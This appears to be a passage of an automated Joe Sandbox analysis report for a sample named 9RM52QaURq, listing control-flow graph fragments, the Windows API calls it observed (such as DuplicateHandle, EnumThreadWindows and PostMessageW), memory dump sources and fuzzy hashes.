                                                                                                                                                                  control_flow_graph 765 11844b4-11859d9 CreateActCtxA 769 11859db-11859e1 765->769 770 11859e2-1185a3c 765->770 769->770 777 1185a4b-1185a4f 770->777 778 1185a3e-1185a41 770->778 779 1185a60 777->779 780 1185a51-1185a5d 777->780 778->777 782 1185a61 779->782 780->779 782->782
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 011859C9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Create
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                  • Opcode ID: 23093db8255e8c585dbe8d06f7106ae504446cc041d1ae3a2314e931dc4c61cd
                                                                                                                                                                  • Instruction ID: 8120a8047ce6b95a97c4b21bb43298b275c168481e89e6ea2e6c33a17609b84e
                                                                                                                                                                  • Opcode Fuzzy Hash: 23093db8255e8c585dbe8d06f7106ae504446cc041d1ae3a2314e931dc4c61cd
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41A1B0C00719CBDB28DFA9C984BDDBBB6FF49304F24806AD408AB255DB756946CF91

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 783 118d701-118d708 784 118d70a-118d82e 783->784 785 118d6c5-118d6d4 DuplicateHandle 783->785 786 118d6dd-118d6fa 785->786 787 118d6d6-118d6dc 785->787 787->786
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0118D606,?,?,?,?,?), ref: 0118D6C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: 6051fe74e0a4cb41c4208d69fa8af7c5a2c3643b8ef3c62cae8d98eb8c16c556
                                                                                                                                                                  • Instruction ID: 2eb3ffc7339d7f4a8b7978421221d5e2d81f94c49901935d16e59a4556084536
                                                                                                                                                                  • Opcode Fuzzy Hash: 6051fe74e0a4cb41c4208d69fa8af7c5a2c3643b8ef3c62cae8d98eb8c16c556
                                                                                                                                                                  • Instruction Fuzzy Hash: BC312974A403888FF704AFA5F88476A3BA6E788751F118529E9258F3D5CABC4D86CF11

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 801 7353555-7353e12 803 7353e14-7353e1c 801->803 804 7353e1e-7353e4e EnumThreadWindows 801->804 803->804 805 7353e57-7353e84 804->805 806 7353e50-7353e56 804->806 806->805
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,07353DB0,03A7410C,02ABC20C), ref: 07353E41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumThreadWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2941952884-0
                                                                                                                                                                  • Opcode ID: 73c4f4d8108ec4d6296991d4d96456675ae635a2f4fb47958c80b00207a2158b
                                                                                                                                                                  • Instruction ID: 2d9e3d9d08f373dfbb1278f53e5744e4832c5353963c5494e58aa7ac06e056d7
                                                                                                                                                                  • Opcode Fuzzy Hash: 73c4f4d8108ec4d6296991d4d96456675ae635a2f4fb47958c80b00207a2158b
                                                                                                                                                                  • Instruction Fuzzy Hash: 102157B1D00259CFDB10CF9AC844BEEFBF4EB98314F14842AD858A7250C778A945CF65

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 810 118b750-118d6d4 DuplicateHandle 812 118d6dd-118d6fa 810->812 813 118d6d6-118d6dc 810->813 813->812
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0118D606,?,?,?,?,?), ref: 0118D6C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: 713a50d071ccdb5339d1a932dada5055b238ba8eaafa89a3f24cc757059957e2
                                                                                                                                                                  • Instruction ID: 2427f1b10e712197ac9780206a7a8a7ef53081d7a6d58158fa15250674437f75
                                                                                                                                                                  • Opcode Fuzzy Hash: 713a50d071ccdb5339d1a932dada5055b238ba8eaafa89a3f24cc757059957e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D2103B5D00318DFDB10DF9AD984ADEBBF4EB48314F10801AE918A7350C374A940CFA4
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,07353DB0,03A7410C,02ABC20C), ref: 07353E41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumThreadWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2941952884-0
                                                                                                                                                                  • Opcode ID: b8f062625c767e60a79ab993a0fbccf1231202eddfcdebf8c51e0f8cdab067db
                                                                                                                                                                  • Instruction ID: c1426a9b6d7a8137c3af42d6b72af34d9ee45819f95d238318ae7e6db7df098a
                                                                                                                                                                  • Opcode Fuzzy Hash: b8f062625c767e60a79ab993a0fbccf1231202eddfcdebf8c51e0f8cdab067db
                                                                                                                                                                  • Instruction Fuzzy Hash: CE2129B19002599FDB14CF9AC844BEEFBF4EF88324F14842AD458A7350D774A945CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,07353DB0,03A7410C,02ABC20C), ref: 07353E41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumThreadWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2941952884-0
                                                                                                                                                                  • Opcode ID: 422f7d685c21de8c7ad7a8448a77f743bac9de100983fcb44eddf501fb5b055f
                                                                                                                                                                  • Instruction ID: e71306f557717a41a2e2afb311804879788c6c987350e81f1776e603d76fab02
                                                                                                                                                                  • Opcode Fuzzy Hash: 422f7d685c21de8c7ad7a8448a77f743bac9de100983fcb44eddf501fb5b055f
                                                                                                                                                                  • Instruction Fuzzy Hash: A92129B1D00219DFEB14CF9AC844BEEFBF4EB88314F14842AD858A7250D774A945CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassInfoW.USER32(?,00000000), ref: 04AE29EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassInfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3534257612-0
                                                                                                                                                                  • Opcode ID: 584fc0db4ae302dcfb2184eda5fcb9d08e1cb96eb730972d5342f81ef075aeb5
                                                                                                                                                                  • Instruction ID: 3a2bfbb8bb6f968f06124e694b95a1bf1c2febf66a3ef197b44ef1c494034405
                                                                                                                                                                  • Opcode Fuzzy Hash: 584fc0db4ae302dcfb2184eda5fcb9d08e1cb96eb730972d5342f81ef075aeb5
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F2125B29017498FDB14CF9AD884AEEFBF4AF48320F14806AE458A7250D374A544CB64
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassInfoW.USER32(?,00000000), ref: 04AE29EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassInfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3534257612-0
                                                                                                                                                                  • Opcode ID: c9752907c940b4b89ab1844e7f4901e54a5d4e44c662b903d4b9127dca279dc5
                                                                                                                                                                  • Instruction ID: 3156939c1f5a59c726c05da8474a4a0a63e41d1f0e40d7a2c535490ac628b922
                                                                                                                                                                  • Opcode Fuzzy Hash: c9752907c940b4b89ab1844e7f4901e54a5d4e44c662b903d4b9127dca279dc5
                                                                                                                                                                  • Instruction Fuzzy Hash: 322115B29017598FDB10CF9AD884BEEFBF8FB48320F14806AD958A7250D374A944CB65
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0118D606,?,?,?,?,?), ref: 0118D6C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: 95fff53d7034c87a514005df32c3649ab5cef38892eeb2a4f5393fc9a046025f
                                                                                                                                                                  • Instruction ID: 0e31060a940dcfdec4326faa6a5a5ec900766047a76445bd4eb6c51c87c50b18
                                                                                                                                                                  • Opcode Fuzzy Hash: 95fff53d7034c87a514005df32c3649ab5cef38892eeb2a4f5393fc9a046025f
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21E2B5900359DFDB10CFAAE584ADEBBF5FB48314F24841AE958B7260C374A940CFA4
                                                                                                                                                                  APIs
                                                                                                                                                                  • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0735434D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2030045667-0
                                                                                                                                                                  • Opcode ID: 19f5018bd773ddbe812dd4b35064a4b2f235d19a8a3f8b333f94b3bed54bfec1
                                                                                                                                                                  • Instruction ID: 2b8ed69b9284244c250ffccdaa29e8ff21147e919c7ef7809b3e18b5e9e1f2bd
                                                                                                                                                                  • Opcode Fuzzy Hash: 19f5018bd773ddbe812dd4b35064a4b2f235d19a8a3f8b333f94b3bed54bfec1
                                                                                                                                                                  • Instruction Fuzzy Hash: 292102B690035A9FDB14CF9AD884ADEFBB4BF48314F14842AD859AB210C375A584CFA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0735434D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2030045667-0
                                                                                                                                                                  • Opcode ID: eb569ab674d5b81127b6f053226ad93cc1cca930465ca14325e00f8915439751
                                                                                                                                                                  • Instruction ID: 5397b6fa10f90cc68a51fc263abcdb5cc9fc3b7759bdf8e7880bba3c9fbec336
                                                                                                                                                                  • Opcode Fuzzy Hash: eb569ab674d5b81127b6f053226ad93cc1cca930465ca14325e00f8915439751
                                                                                                                                                                  • Instruction Fuzzy Hash: 572113B58003599FDB14CF9AD884ADEFBB4FB88350F10842ED818A7210C375A584CFA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 04AEBF68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePeek
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2222842502-0
                                                                                                                                                                  • Opcode ID: 2c612883727da2d8e142c5922901afc0b8c6637cbe1734cbad63d212cfaba4a9
                                                                                                                                                                  • Instruction ID: 2d0598fd2e78c66e230f93dbd1a9f91e52a19422e3b4489e2cd68a8fdffea2b1
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c612883727da2d8e142c5922901afc0b8c6637cbe1734cbad63d212cfaba4a9
                                                                                                                                                                  • Instruction Fuzzy Hash: FE1107B5800259DFDB10CF9AD944BEEFBF8FB48320F14842AE958A7251C378A545CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 04AEC235
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                  • Opcode ID: 1fb0b76062d4019b984d489b6f2cb0b9329b7a4322a2aa951059d4ce82f2376b
                                                                                                                                                                  • Instruction ID: 8bf641e800a33d099b2e66dc4a417756627cfccb9580b4722a031b8e86d29a48
                                                                                                                                                                  • Opcode Fuzzy Hash: 1fb0b76062d4019b984d489b6f2cb0b9329b7a4322a2aa951059d4ce82f2376b
                                                                                                                                                                  • Instruction Fuzzy Hash: 1111F6B5800259DFDB10DF9AD844BEEFBF4FB48324F10842AE958A7251C378A545CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 04AEBF68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePeek
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2222842502-0
                                                                                                                                                                  • Opcode ID: 5f95128458c6ba2be0b5b9c0053d17f02c6b0ef0fbf305435d5fde5b082cd21e
                                                                                                                                                                  • Instruction ID: 62666519ac73a4933c612b109c73deaebd766e1dd4818e892e4c1b197c6d9d29
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f95128458c6ba2be0b5b9c0053d17f02c6b0ef0fbf305435d5fde5b082cd21e
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B11D4B5800259DFDB10CF9AD944BEEFBF8EB48324F10842AE958A7251C379A544CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0735427F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                  • Opcode ID: 7a1e6bb8c3e15a0c74990de12b6334242039294b7e33a926a00e81d0e27d49a2
                                                                                                                                                                  • Instruction ID: 06d892b872b01ae3a5ae74f211c3294005ae130022ee65165c22319e65df6513
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a1e6bb8c3e15a0c74990de12b6334242039294b7e33a926a00e81d0e27d49a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 22116AB6800359CFDB10CF9AC445BEEFBF4EB58320F14802AD858A7240D338A584CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 04AEC235
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                  • Opcode ID: 77a6827046fd7324847dde9be7e5e1a5de6ee70fd00ad245a205c7e1a4a2b076
                                                                                                                                                                  • Instruction ID: a1f688c1afc1365618c17a353eda8c3c8ff79be35818b948be6c58abc2cf6d6b
                                                                                                                                                                  • Opcode Fuzzy Hash: 77a6827046fd7324847dde9be7e5e1a5de6ee70fd00ad245a205c7e1a4a2b076
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C11C3B58003599FDB10DF9AD944BEEFBF8FB48324F10842AE558A7251C378A544CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 04AE42FD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                  • Opcode ID: 02460cd28e4172c7cd7fc75dc96424bd61f5c49fc09b6187a649d3cd011b8750
                                                                                                                                                                  • Instruction ID: 06aeba46c315696023841f4170f97b6530f610cb675f6119e87f7c3538a41a04
                                                                                                                                                                  • Opcode Fuzzy Hash: 02460cd28e4172c7cd7fc75dc96424bd61f5c49fc09b6187a649d3cd011b8750
                                                                                                                                                                  • Instruction Fuzzy Hash: B61125B5800349DFDB10CF9AD845BEEFBF8EB58320F14841AE554A7251C378A984CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0118AD84), ref: 0118AFBE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: 7586eb5222a987b83e267b3b719c0d06e5ae71e585227289c604d39f6f278b4e
                                                                                                                                                                  • Instruction ID: 63d71a565e1a19c63b71e83bd8919eb407db0cdeaa014a5b459a3948c581f545
                                                                                                                                                                  • Opcode Fuzzy Hash: 7586eb5222a987b83e267b3b719c0d06e5ae71e585227289c604d39f6f278b4e
                                                                                                                                                                  • Instruction Fuzzy Hash: 901120B18002498FDB14DF9AD444ADEFBF4AF88318F10C42AD528B7250C378A545CFA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0735427F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                  • Opcode ID: 790477e60cf214573f7d22a6f8aef0ef625b739e7c05cf0279aa85288451cb45
                                                                                                                                                                  • Instruction ID: 22ed5ea2cb3f4eda67e654731530bda5201160cef986eddb346daf583fd5ebde
                                                                                                                                                                  • Opcode Fuzzy Hash: 790477e60cf214573f7d22a6f8aef0ef625b739e7c05cf0279aa85288451cb45
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F114CB5800359CFDB10CF9AC445BEEFBF4EB58320F14842AD858A7250D338A584CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                  • Opcode ID: 3b64e0c453ee803b4641a5d84aed248e207ef1b30bb89f9bb9a539396ea86ecc
                                                                                                                                                                  • Instruction ID: deab8a7a24bbe15833e85fbcf4d7383224c1af50625b8875dbc205f67ee61349
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b64e0c453ee803b4641a5d84aed248e207ef1b30bb89f9bb9a539396ea86ecc
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A11ACB58043488FCB20DFAAC444BDEFFF8EB08724F24845AD459A7251D375A840CFA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 04AE42FD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                  • Opcode ID: 553b4c35371e5e4e3b1eda954c1b3322d1677c5d334ac697e7a13a3b4e625cdc
                                                                                                                                                                  • Instruction ID: 97b4cb9dbe255dea18fed0f7516ddb10c574b959fa23e3b811c23d0494eb1a66
                                                                                                                                                                  • Opcode Fuzzy Hash: 553b4c35371e5e4e3b1eda954c1b3322d1677c5d334ac697e7a13a3b4e625cdc
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B1103B5800349DFDB10CF9AC845BEEFBF8EB58320F10841AE558A7251D378A984CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 073552E8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                  • Opcode ID: a66e7dfc9a28384b3aff5ae0f9aef7129ce3abd98e7ec3e8558b12e091e715ad
                                                                                                                                                                  • Instruction ID: a46158266ecfa740ab67c65fa04b54e809db3ef431723a14a10f1bee754c2533
                                                                                                                                                                  • Opcode Fuzzy Hash: a66e7dfc9a28384b3aff5ae0f9aef7129ce3abd98e7ec3e8558b12e091e715ad
                                                                                                                                                                  • Instruction Fuzzy Hash: FD1125B18003099FEB10CF89C94ABEEBFF4EB08324F10841AE959B7250C375A584CFA5
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                                                  • Opcode ID: 9f8f2ed04904147e9f584ac0ccb1e168fa4a1fe2e36459ebd18d060e90e28da2
                                                                                                                                                                  • Instruction ID: b59bfdcdf34293959c65e1f5549de9ae0fae07d351ca898ec8154cca7918e06f
                                                                                                                                                                  • Opcode Fuzzy Hash: 9f8f2ed04904147e9f584ac0ccb1e168fa4a1fe2e36459ebd18d060e90e28da2
                                                                                                                                                                  • Instruction Fuzzy Hash: F71122B1C047888FCB10CFAAD4446DEFBF0EF49324F10845AD469A7251D374A144CFA2
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                  • Opcode ID: 70089ad4dde4333c7ecd204ac920b0da87f4bbfb78ee78e6c6d645dd1458f8ec
                                                                                                                                                                  • Instruction ID: 0a89a9b4d1303f3ae9a0b8f190557be887ca390c2382426cdbdf2c87366c3950
                                                                                                                                                                  • Opcode Fuzzy Hash: 70089ad4dde4333c7ecd204ac920b0da87f4bbfb78ee78e6c6d645dd1458f8ec
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B1179B58043888FCB20DFAAD444BDEFFF4EB49724F24889AD198A7251D375A445CFA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,?,?,?), ref: 04AE0E2D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID:
